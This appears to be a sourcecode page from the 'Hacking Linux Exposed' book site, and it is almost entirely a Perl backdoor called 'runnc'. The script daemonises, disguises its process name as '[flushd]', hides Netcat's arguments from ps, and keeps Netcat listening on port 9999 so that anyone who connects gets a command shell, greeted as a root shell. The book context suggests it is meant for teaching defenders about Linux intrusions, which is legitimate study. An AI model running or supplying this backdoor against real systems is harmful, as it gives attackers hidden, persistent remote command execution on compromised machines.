Hacking Linux Exposed

About
Authors
Contents
Reviews
Foreword
Purchase

Articles
Books
Sourcecode
Tools
Errata

Home

 


(view this code in a separate window)

#!/usr/bin/perl
#
# runnc - run Netcat root shell.
#
# Usage:
#     'runnc -d' to be daemon,
#     'runnc' to be Netcat helper program (pseudo shell.)

use POSIX;

$FAKENAME='[flushd]';
$ME = $0;                       # save actual process name
$0 = $FAKENAME;                 # Hide process name

# If we are launched by 'nc -e' we will be called with
# no arguments, so act as the pseudo-shell, looping
# through input allowing the hacker to run commands.
unless ( @ARGV ) {
        $|=1;
        open STDERR, ">&STDOUT";
        print "Welcome to your root shell.\n";
        print "hackedbox# ";                    # Print prompt for grins
        while (<>) {
                chomp;
                system($_) && print "$!\n";     # Run shell command
                print "hackedbox# ";
        }
        exit;
}

# We're supposed to start as a daemon.
chdir '/';

# redirect file descriptors
open STDIN, '/dev/null';
open STDOUT, '>/dev/null';
open STDERR, '>&STDOUT';

# fork off and get owned by init.
fork and exit;

# dissociate from terminal
setsid                  or die "Can't start a new session: $!";


do {
        print "Running Netcat\n";
        # fork and run the Netcat program (hide its process name too.)
        unless (open NETCAT, "|-") {
                exec { "/home/bri/bin/nc" } $FAKENAME;
                exit;
        } else {
                # send it the command line args in stdin to hide from ps.
                print NETCAT "-l -p 9999 -e $ME";
                close NETCAT;
        }
        wait;   # wait for Netcat to complete.
} while 1;      # keep looping forever.